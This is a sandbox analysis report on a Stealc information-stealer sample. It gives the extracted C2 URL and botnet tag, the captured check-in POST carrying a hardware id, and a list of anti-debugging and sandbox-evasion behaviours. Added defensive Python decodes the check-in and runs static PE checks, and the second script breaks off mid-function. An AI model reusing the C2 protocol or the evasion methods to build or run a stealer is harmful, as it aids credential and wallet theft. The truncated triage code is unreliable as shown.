
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1542004
MD5: e5554752275f657385f52a9200ce5d65
SHA1: 20111ab044d48a47dcd1240fd0b098f024c16bc4
SHA256: 75c80ec13c3aae80d4eaf263e35ac39fdc644b4b4eb7fab66a4217354bd7e5fd
Tags: exe, user-Bitsight

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2884 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E5554752275F657385F52A9200CE5D65)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration (extracted from 0.2.file.exe.930000.0.unpack):
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2216744474.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 2884 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 2884 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.930000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma: No Sigma rule has matched

Suricata alerts (Timestamp | SID | Severity | Classtype | Source | Destination | Protocol):
2024-10-25T12:33:22.999220+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5:49721 | 185.215.113.37:80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.930000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00939AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00937240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00939B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00948EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00944910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00944570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00943EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49721 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----FBGCAAAAFBKEBFHJEGCF
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 46 42 47 43 41 41 41 41 46 42 4b 45 42 46 48 4a 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 31 39 37 36 39 45 30 42 37 34 46 34 30 33 33 30 36 30 30 37 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 43 41 41 41 41 46 42 4b 45 42 46 48 4a 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 43 41 41 41 41 46 42 4b 45 42 46 48 4a 45 47 43 46 2d 2d 0d 0a
    Data Ascii (CRLF line breaks restored from the raw bytes):
        ------FBGCAAAAFBKEBFHJEGCF
        Content-Disposition: form-data; name="hwid"

        119769E0B74F4033060071
        ------FBGCAAAAFBKEBFHJEGCF
        Content-Disposition: form-data; name="build"

        doma
        ------FBGCAAAAFBKEBFHJEGCF--
    (Neither request carries a User-Agent header. The body is 211 bytes, matching Content-Length, and the "build" field carries the botnet tag "doma" from the extracted configuration. The report lists this same POST a second time under an "unknown" source; the duplicate is omitted here.)
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times; the C2 is configured as a bare IP, so no DNS lookup precedes the connections)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00936280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/#
Source: file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/:
Source: file.exe, 00000000.00000002.2257803413.0000000001124000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2257803413.000000000115B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpN
Source: file.exe, 00000000.00000002.2257803413.000000000115B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpc%
Source: file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy
Source: file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37S
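The POST above is the sample's first contact with the configured C2: a multipart form with a hardware id and the build tag, sent without a User-Agent. The following is an added example (editor's code, not Joe Sandbox's and not the logic of the Suricata rule) that decodes the captured bytes, recovers the form fields and applies a triage heuristic. The request head and the raw body are copied verbatim from the capture; the heuristic's conditions (POST to a .php path, multipart body, no User-Agent, Content-Length consistent with the body, exactly the fields hwid and build) are the editor's choice based only on what this capture shows, so treat the verdict as an indicator and not as a signature with a known false-positive rate.

```python
"""Decode and triage the Stealc check-in captured in the report.

Added example; parser and heuristic are the editor's, not Joe Sandbox's.
Request head and body bytes are copied from the report's capture.
"""
import re

CAPTURED_REQUEST = (
    "POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    "Content-Type: multipart/form-data; boundary=----FBGCAAAAFBKEBFHJEGCF\r\n"
    "Host: 185.215.113.37\r\n"
    "Content-Length: 211\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
)

# "Data Raw" from the capture, regrouped by field for readability.
CAPTURED_BODY = bytes.fromhex(
    "2d2d2d2d2d2d 464247434141414146424b454246484a45474346 0d0a"        # ------<boundary>
    "436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b20"   # Content-Disposition: form-data;
    "6e616d653d2268776964220d0a0d0a"                                      # name="hwid" + blank line
    "31313937363945304237344634303333303630303731 0d0a"                   # 119769E0B74F4033060071
    "2d2d2d2d2d2d 464247434141414146424b454246484a45474346 0d0a"
    "436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b20"
    "6e616d653d226275696c64220d0a0d0a"                                    # name="build" + blank line
    "646f6d61 0d0a"                                                       # doma
    "2d2d2d2d2d2d 464247434141414146424b454246484a45474346 2d2d 0d0a"    # ------<boundary>--
)


def parse_request_head(raw: str):
    """Return (method, path, {lower-cased header name: value}) for one request head."""
    lines = raw.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Split a multipart/form-data body into {field name: value} (CRLF framing, RFC 7578)."""
    delimiter = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):                 # closing delimiter "--boundary--"
            break
        head, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', head)
        if match:
            value = value[:-2] if value.endswith(b"\r\n") else value
            fields[match.group(1).decode()] = value.decode("latin-1")
    return fields


def is_stealc_checkin(raw_head: str, body: bytes) -> bool:
    """Heuristic built from this capture: POST to a .php path, multipart body, no
    User-Agent, Content-Length matching the body, and exactly the fields hwid+build."""
    method, path, headers = parse_request_head(raw_head)
    if method != "POST" or not path.endswith(".php") or "user-agent" in headers:
        return False
    ctype = headers.get("content-type", "")
    boundary = re.search(r"boundary=([^;]+)", ctype)
    if not ctype.startswith("multipart/form-data") or boundary is None:
        return False
    if headers.get("content-length") not in (None, str(len(body))):
        return False                               # truncated/padded capture: fields untrustworthy
    return set(parse_multipart(body, boundary.group(1).strip())) == {"hwid", "build"}


def checkin_summary(raw_head: str, body: bytes) -> dict:
    """What an analyst wants from a check-in: where it went and how the bot identified itself."""
    _, path, headers = parse_request_head(raw_head)
    boundary = re.search(r"boundary=([^;]+)", headers.get("content-type", ""))
    fields = parse_multipart(body, boundary.group(1).strip()) if boundary else {}
    return {"c2": "http://" + headers.get("host", "?") + path, **fields}


if __name__ == "__main__":
    print(is_stealc_checkin(CAPTURED_REQUEST, CAPTURED_BODY))
    print(checkin_summary(CAPTURED_REQUEST, CAPTURED_BODY))
```

Run stand-alone, the summary's "c2" value equals the C2 URL in the extracted configuration and "build" equals its "Botnet" value, which is the cross-check between the static extractor and the network capture that an analyst should make before trusting either.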

                System Summary

Source: file.exe | Static PE information: section name: (blank or non-printable name)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank or non-printable name)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CF60F7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BC8032
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFD134
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D03942
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C6825A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CF7BC2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA93C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CCC34D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BEAB2F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C03C57
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D05406
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFEDAF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D00579
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD2567
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CF966E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D01E61
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CF1678
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CEF628
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2CFD0
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 009345C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: mpjgkmbj ZLIB complexity 0.9952078025174932
Source: file.exe, 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2216744474.0000000004F80000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00948680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00943720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\3QQ8464Q.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1839104 > 1048576
Source: file.exe | Static PE information: Raw size of mpjgkmbj is bigger than: 0x100000 < 0x19ae00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.930000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mpjgkmbj:EW;tclqnlva:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mpjgkmbj:EW;tclqnlva:EW;.taggant:EW; (section rights after unpacking vs. on disk: the unnamed first section is execute/read on disk and execute/write once unpacked, which is the "changes PE section rights" signature)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00949860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cae34 should be: 0x1c8fc6 (value stored in the optional header vs. the value recomputed over the file)
Source: file.exe | Static PE information: section name: (blank or non-printable name)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank or non-printable name)
Source: file.exe | Static PE information: section name: mpjgkmbj
Source: file.exe | Static PE information: section name: tclqnlva
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push 247ECC19h; mov dword ptr [esp], ebx (at 0_2_00CFB0F0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push 2A912422h; mov dword ptr [esp], edi (at 0_2_00CFB116)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push 1339570Dh; mov dword ptr [esp], edx (at 0_2_00CFB12B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push esi; mov dword ptr [esp], edx (at 0_2_00CFB15A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push 0911048Ah; mov dword ptr [esp], edx (at 0_2_00CFB168)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push ebp; mov dword ptr [esp], esi (at 0_2_00CFB1DC)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push 585DA751h; mov dword ptr [esp], ebp (at 0_2_00CFB243)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push 222E979Ah; mov dword ptr [esp], ebp (at 0_2_00CFB275)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push esi; mov dword ptr [esp], edx (at 0_2_00CFB307)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push 226E7554h; mov dword ptr [esp], edx (at 0_2_00CFB37B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push esi; mov dword ptr [esp], edi (at 0_2_00CFB39B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push edx; mov dword ptr [esp], esi (at 0_2_00CFB4C8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push edx; mov dword ptr [esp], 7FF487FBh (at 0_2_00CFB5DE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push esi; mov dword ptr [esp], 6D6F1CC6h (at 0_2_00CFB6D0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push 30C5F615h; mov dword ptr [esp], edi (at 0_2_00CFB759)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push ebp; mov dword ptr [esp], edi (at 0_2_00CFB8EA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push 5035BE37h; mov dword ptr [esp], edi (at 0_2_00CFB8F4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push edi; mov dword ptr [esp], eax (at 0_2_00CFB98D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push 2740F39Dh; mov dword ptr [esp], ebp (at 0_2_00CFBA02)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push ebx; mov dword ptr [esp], ecx (at 0_2_00CFBA80)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push 6F88F947h; mov dword ptr [esp], esp (at 0_2_00CFBA8B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push 4DD02002h; mov dword ptr [esp], esi (at 0_2_00CFBA93)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push 1154087Eh; mov dword ptr [esp], ebx (at 0_2_00CFBAF0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push 6FAFC50Eh; mov dword ptr [esp], ecx (at 0_2_00CFBB01)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push ebp; mov dword ptr [esp], eax (at 0_2_00CFBB3F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push eax; mov dword ptr [esp], ebx (at 0_2_00CFBB77)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push 43FF4EC2h; mov dword ptr [esp], ecx (at 0_2_00CFBBA2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push ebx; mov dword ptr [esp], eax (at 0_2_00CFBBA8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push ebx; mov dword ptr [esp], 6FE6CEA0h (at 0_2_00CFBC4A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push edx; mov dword ptr [esp], eax (at 0_2_00CFBC6E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB0E7 push 29601D4Eh; mov dword ptr [esp], ecx (at 0_2_00CFBD4A)
(Each "push X; mov dword ptr [esp], Y" pair is equivalent to a single "push Y": the pushed operand X is junk that is overwritten immediately, so the pair defeats byte-pattern matching without changing behaviour.)
Source: file.exe | Static PE information: section name: mpjgkmbj entropy: 7.954876039100938
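The Data Obfuscation findings above (stored checksum 0x1cae34 vs. recomputed 0x1c8fc6, entry point in .taggant, sections mpjgkmbj and tclqnlva, entropy 7.95) are all cheap static checks worth running before a sample goes near a sandbox. The following is an added example, not Joe Sandbox's code, that reproduces them with the Python standard library. Because the analysed file is not on this page, the block constructs its own small PE32 that mimics the reported layout (a random-looking section name and the entry point inside a trailing .taggant section); its checksum and entropy values are its own, not the sample's. One check against the report is possible without the file: both reported checksum values are a 16-bit quantity plus the file size 0x1C1000 (1839104), which is exactly the shape the algorithm below produces.

```python
"""Static PE triage: checksum mismatch, entry point outside the standard code
section, non-standard section names and high-entropy (packed) sections.

Added example using only the standard library; not Joe Sandbox's code.  The PE
returned by build_sample_pe() is constructed here and is not the analysed sample.
"""
import hashlib
import math
import struct

STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".CRT"}


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """PE header checksum as imagehlp's CheckSumMappedFile computes it: a 16-bit
    end-around-carry sum over the file, skipping the CheckSum field, plus the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    skip = checksum_offset - checksum_offset % 4
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:                         # fold the carry back in
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 8.0 is uniform random; packed or encrypted data sits above ~7."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Minimal PE32 header walk: entry RVA, CheckSum field offset and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
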